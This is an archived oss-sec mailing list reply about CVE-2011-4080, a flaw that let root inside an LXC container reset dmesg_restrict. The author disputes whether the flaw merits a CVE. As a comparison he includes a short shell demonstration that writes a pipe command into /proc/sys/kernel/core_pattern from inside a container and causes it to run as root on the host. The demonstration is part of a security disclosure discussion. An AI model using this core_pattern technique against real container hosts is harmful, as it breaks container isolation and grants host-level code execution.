oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CVE Request -- kernel: sysctl: restrict write access to dmesg_restrict

From: Vasiliy Kulikov <segoon () openwall com>
Date: Wed, 26 Oct 2011 19:53:10 +0400
Hi,

On Wed, Oct 26, 2011 at 09:26 -0600, Kurt Seifried wrote:

On 10/26/2011 09:16 AM, Petr Matousek wrote:

When dmesg_restrict is set to 1 CAP_SYS_ADMIN is needed to read the
kernel ring buffer. But a root user without CAP_SYS_ADMIN is able
to reset dmesg_restrict to 0.

This is an issue when e.g.  LXC (Linux Containers) are used and complete
user space is running without CAP_SYS_ADMIN.  A unprivileged and jailed
root user can bypass the dmesg_restrict protection.

Introduced by:
eaf06b241b091357e72b76863ba16e89610d31bd

Fixed by:
bfdc0b497faa82a0ba2f9dddcf109231dd519fcc

Thanks,

Please use CVE-2011-4080 for this issue.


Why does it worth CVE?  Procfs is not ready for containers yet.  You can
use other sysctls for more harmful things.  E.g. kernel.core_pattern
allows arbitrary code execution as a full root - does it need a CVE too
then? :-)

root@lxc-ubuntu:/proc/sys/kernel# echo "|/usr/bin/touch /tmp/pwned" > core_pattern
root@lxc-ubuntu:/proc/sys/kernel# cat 
^\Quit (core dumped)

(In the root namespace)
$ ls /tmp/pwned
/tmp/pwned

-- 
Vasiliy Kulikov
http://www.openwall.com - bringing security into open computing environments
Previous By Date Next
Previous By Thread Next

Current thread: